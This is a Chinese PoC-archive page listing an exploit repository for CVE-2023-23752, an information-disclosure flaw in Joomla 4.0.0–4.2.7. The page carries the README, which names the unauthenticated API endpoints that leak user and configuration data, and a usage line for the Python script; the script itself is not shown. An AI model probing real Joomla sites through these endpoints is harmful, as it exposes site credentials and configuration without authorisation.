POC详情: 7ef5b27161bbf4165bb275d70f8a9905ebb95702

来源
关联漏洞
标题: Joomla 安全漏洞 (CVE-2023-23752)
描述:Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla 4.0.0版本至4.2.7版本存在安全漏洞,该漏洞源于不正确的访问检查,允许对web服务端点进行未经授权的访问。
描述
 CVE-2023-23752 - Joomla Information Disclosure Vulnerability
介绍
# CVE-2023-23752 - Joomla Information Disclosure

Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...

I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".

---
This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:

#### User Info

`/api/index.php/v1/config/applicaton?public=true`

#### Config Info

`/api/index.php/v1/config/application?public=true"`

## Usage
`python3 CVE-2023-23752.py -t <target_url>`

---


# License
GPL v3.0 - as all good software should be

Remember - don't be a skid :)
文件快照

[4.0K] /data/pocs/7ef5b27161bbf4165bb275d70f8a9905ebb95702 ├── [2.5K] CVE-2023-23752.py ├── [ 34K] LICENSE └── [ 714] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。